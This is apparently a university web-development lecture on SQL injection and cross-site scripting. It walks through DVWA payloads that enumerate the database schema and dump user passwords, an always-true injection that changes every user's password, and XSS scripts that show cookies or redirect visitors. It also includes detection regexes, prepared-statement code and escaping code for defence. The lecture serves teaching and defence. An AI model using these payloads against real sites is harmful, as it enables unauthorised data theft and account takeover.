SQL Injection and XSS
webdev@rgu: SQL injection and XSS
a word of warning
Everything that we are going over today, while practical, is meant for penetration testing only! You’ll get in a lot of trouble if you use this on live websites that you don’t own!
Also…the fuzz will come after you.
what is sql injection
SQL injection (also known as SQL fishing) is a technique often used to attack data-driven applications.
This is done by including portions of SQL statements in an entry field, in an attempt to get the website to pass a newly formed rogue SQL command to the database (e.g., to dump the database contents to the attacker).
SQL injection is a code injection technique that exploits a security vulnerability in an application's software.
The vulnerability happens when user input is either incorrectly filtered for string-literal escape characters embedded in SQL statements, or is not strongly typed and so is unexpectedly executed as part of the query.
SQL injection is mostly known as an attack vector for websites, but can be used to attack any type of SQL database.
A request such as
http://www.bugtracker.com/bugs.php?bugID=007
is turned into the query
SELECT * FROM softwareBugs WHERE bugID = $_GET['bugID']
which, with the parameter filled in, becomes
SELECT * FROM softwareBugs WHERE bugID = 007
Now change the parameter:
http://www.bugtracker.com/bugs.php?bugID=007 OR TRUE
SELECT * FROM softwareBugs WHERE bugID = 007 OR TRUE
This can be used to gain access to all bugs.
worse example
http://www.bugtracker.com/changepassword.php?userID=1234&pass=mynewpass
UPDATE Users SET password = 'pass' WHERE userID = 1234
With the same trick applied to the userID parameter:
http://www.bugtracker.com/changepassword.php?userID=1234 OR TRUE &pass=mynewpass
UPDATE Users SET password = 'pass' WHERE userID = 1234 OR TRUE
This changes all user passwords!
this is easy though…who would get caught out with an sql injection attack!?
Archos 2014
Wordpress February 2015
Drupal Attack March 2015
in-depth SQL injection attack: DVWA
This is DVWA. All of our SQL injection is going to happen using this userID box.
1
No SQL injection, just putting normal data into the form.
%' or '0'='0
All information from a table: the 'Always True' injection.
%' or 0=0 union select null, version() #
Finding out server information.
%' or 0=0 union select null, user() #
Finding out the database location.
%' or 0=0 union select null, database() #
Finding out the name of the database.
%' and 1=0 union select null, table_name from information_schema.tables #
Listing table names from information_schema, the part of the database that describes its own structure.
%' and 1=0 union select null, table_name from information_schema.tables where table_name like 'user%'#
Finding tables whose name starts with the word 'user'.
%' and 1=0 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name = 'users' #
Finding the names of all the fields in the table 'users'.
%' and 1=0 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users #
Finding all of the information stored in the table users.
And this is what we are after! The admin password!
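As a defender's counterpart to the walkthrough above, here is added example code (not from the slides) that scans web server access log lines for the signatures these payloads leave behind: union select, information_schema lookups, version()/user()/database() fingerprinting, always-true comparisons and a trailing comment marker. The log lines and the /dvwa/vulnerabilities/sqli/ path are constructed for the example.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Signatures taken from the DVWA payloads walked through above.
SIGNATURES = {
    "union-select": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "schema-enum": re.compile(r"\binformation_schema\.", re.I),
    "fingerprint-fn": re.compile(r"\b(version|user|database)\s*\(\s*\)", re.I),
    "always-true": re.compile(r"\bor\s+('?)(\w+)\1\s*=\s*\1\2\b", re.I),
    "comment-tail": re.compile(r"(#|--\s|/\*)\s*$"),
}

# Constructed Apache-style access log lines; the path is an assumed DVWA URL.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Mar/2015:10:00:01 +0000] "GET /dvwa/vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1" 200 1532',
    '10.0.0.5 - - [01/Mar/2015:10:00:07 +0000] "GET /dvwa/vulnerabilities/sqli/?id=%25%27+or+%270%27%3D%270&Submit=Submit HTTP/1.1" 200 4410',
    '10.0.0.5 - - [01/Mar/2015:10:00:15 +0000] "GET /dvwa/vulnerabilities/sqli/?id=%25%27+or+0%3D0+union+select+null%2C+version%28%29+%23&Submit=Submit HTTP/1.1" 200 1610',
    '10.0.0.5 - - [01/Mar/2015:10:00:31 +0000] "GET /dvwa/vulnerabilities/sqli/?id=%25%27+and+1%3D0+union+select+null%2C+table_name+from+information_schema.tables+%23&Submit=Submit HTTP/1.1" 200 5120',
]

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')


def scan_request(target):
    """Decode each query parameter of a request target; return matched signature names."""
    hits = set()
    for _name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        for sig, rx in SIGNATURES.items():
            if rx.search(value):
                hits.add(sig)
    return sorted(hits)


def scan_log(lines):
    """Return (client_ip, [signatures]) for every request that matched something."""
    findings = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue  # not a request line we understand; skip rather than guess
        hits = scan_request(m.group(1))
        if hits:
            findings.append((line.split()[0], hits))
    return findings


if __name__ == "__main__":
    for ip, hits in scan_log(SAMPLE_LOG):
        print(ip, ", ".join(hits))
```

Signatures are matched on the decoded parameter value, so URL encoding and `+` for spaces (as the DVWA form sends them) do not hide the payload.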
what is cross site scripting
Cross-site scripting (XSS) is a type of computer security vulnerability typically found in Web applications.
XSS enables attackers to inject client-side script into Web pages viewed by other users.
A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same origin policy.
In addition, the attacker can send input (e.g., username, password, session ID) which can later be captured by an external script.
The victim's browser has no way to know that the script should not be trusted, and will execute it. Because it thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other sensitive information retained by the browser and used with that site.
<script>alert("This is a XSS Exploit Test")</script>
Displays an alert message when a person visits the screen.
<iframe src="http://www.cnn.com"></iframe>
Creates an iframe that can hold content from another site.
<script>alert(document.cookie)</script>
Displays an alert message with the user's current cookie.
<script>window.location="http://www.example.com"</script>
Auto-redirects a user.
(I’m sorry)
<script>alert("This is a XSS Exploit Test")</script>
simple test
<iframe src="http://www.cnn.com"></iframe>
Embed content into the page
<script>alert(document.cookie)</script>
Get the current cookie used by a user
<script>window.location="http://www.example.com"</script>
Redirect the user to a different page
protecting against sql injection and xss
sql injection
- Prepared Statements
- Stored Procedures
- Escaping all user-supplied input
- Least Privilege
- White List Validation
https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
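The bug tracker queries from the earlier slides, rebuilt on an in-memory SQLite database to show the string-built statement beside the prepared statement and allow-list check recommended above. This is added example code, not from the slides; the table contents are constructed, and an input of `OR 1=1` plays the part of the slides' `OR TRUE` (SQLite accepts `1=1` on every version).

```python
import sqlite3


def make_db():
    # Constructed stand-in for the slides' softwareBugs and Users tables.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE softwareBugs (bugID INTEGER, title TEXT);
        INSERT INTO softwareBugs VALUES (7, 'login form fails'), (8, 'crash on save');
        CREATE TABLE Users (userID INTEGER, password TEXT);
        INSERT INTO Users VALUES (1234, 'old-pass'), (5678, 'other-pass');
    """)
    return db


def is_valid_id(value):
    # Allow-list validation: an ID is ASCII digits only; anything else never reaches a query.
    return value.isascii() and value.isdigit()


def bugs_vulnerable(db, bug_id):
    # As on the slide: the raw parameter is pasted into the statement, so a value
    # of "7 OR 1=1" rewrites the WHERE clause and every bug comes back.
    return db.execute("SELECT * FROM softwareBugs WHERE bugID = " + bug_id).fetchall()


def bugs_prepared(db, bug_id):
    # Prepared statement: the value is bound separately from the SQL text, so it
    # can never be parsed as SQL. The allow-list check rejects junk up front.
    if not is_valid_id(bug_id):
        raise ValueError("bugID must be an integer")
    return db.execute("SELECT * FROM softwareBugs WHERE bugID = ?", (int(bug_id),)).fetchall()


def change_password_vulnerable(db, user_id, new_pw):
    # The "worse example": "1234 OR 1=1" makes the UPDATE hit every row.
    # Returns the number of rows changed.
    sql = "UPDATE Users SET password = '%s' WHERE userID = %s" % (new_pw, user_id)
    return db.execute(sql).rowcount


def change_password_prepared(db, user_id, new_pw):
    # Hardened form: bound parameters plus validation, so at most one row changes.
    if not is_valid_id(user_id):
        raise ValueError("userID must be an integer")
    return db.execute("UPDATE Users SET password = ? WHERE userID = ?",
                      (new_pw, int(user_id))).rowcount


if __name__ == "__main__":
    db = make_db()
    print(len(bugs_vulnerable(db, "7 OR 1=1")), "bugs leaked;",
          change_password_vulnerable(db, "1234 OR 1=1", "x"), "passwords changed")
```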
XSS
- Never insert untrusted data except in allowed locations
- HTML Escape before inserting untrusted data into HTML
- Attribute Escape…
- Javascript Escape…
- CSS Escape…
- URL Escape…
In other words…check EVERYTHING! XSS is very common and is really easy to exploit.
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
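The escaping rules listed above, as added example code (not from the slides or from OWASP): one encoder per output context, exercised against the four payloads from the XSS slides, plus a check that only the page's own script tag survives rendering. `render_comment` and the context names are assumptions made for the example.

```python
import html
import re
from urllib.parse import quote

# The four payloads from the slides, used here as untrusted input.
PAYLOADS = [
    '<script>alert("This is a XSS Exploit Test")</script>',
    '<iframe src="http://www.cnn.com"></iframe>',
    '<script>alert(document.cookie)</script>',
    '<script>window.location="http://www.example.com"</script>',
]


def html_body_escape(value):
    # HTML escape: & < > " ' become entities before the value goes into element content.
    return html.escape(value, quote=True)


def html_attr_escape(value):
    # Attribute escape: inside a quoted attribute, encode every non-alphanumeric
    # character as &#xHH; so the value can never close the quote or the tag.
    return re.sub(r"[^A-Za-z0-9]", lambda m: "&#x%02X;" % ord(m.group()), value)


def js_string_escape(value):
    # JavaScript escape: inside a JS string literal, \xHH (or \uHHHH for other BMP
    # characters) every non-alphanumeric so neither a closing quote nor </script> survives.
    def enc(m):
        cp = ord(m.group())
        return "\\x%02X" % cp if cp < 0x100 else "\\u%04X" % cp
    return re.sub(r"[^A-Za-z0-9]", enc, value)


def url_param_escape(value):
    # URL escape: percent-encode before the value becomes a query parameter.
    return quote(value, safe="")


def render_comment(untrusted):
    """Place one untrusted value into body, attribute and script contexts."""
    return (
        '<div class="comment">' + html_body_escape(untrusted) + '</div>'
        '<input value="' + html_attr_escape(untrusted) + '">'
        '<script>var v = "' + js_string_escape(untrusted) + '";</script>'
    )


def leaks_markup(rendered):
    # True if a payload tag survived encoding: the only <script is the page's own.
    low = rendered.lower()
    return low.count("<script") != 1 or "<iframe" in low
```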
is that it!?
We’re going to do a lot more protection in the lab…don’t worry!
We’re going to give you a chance to improve a website’s security in terms of SQL injection and XSS vulnerabilities.
If you want to try some of these things out yourself…we’re working on it.
Getting DVWA to work properly on a secure network is difficult, even ours!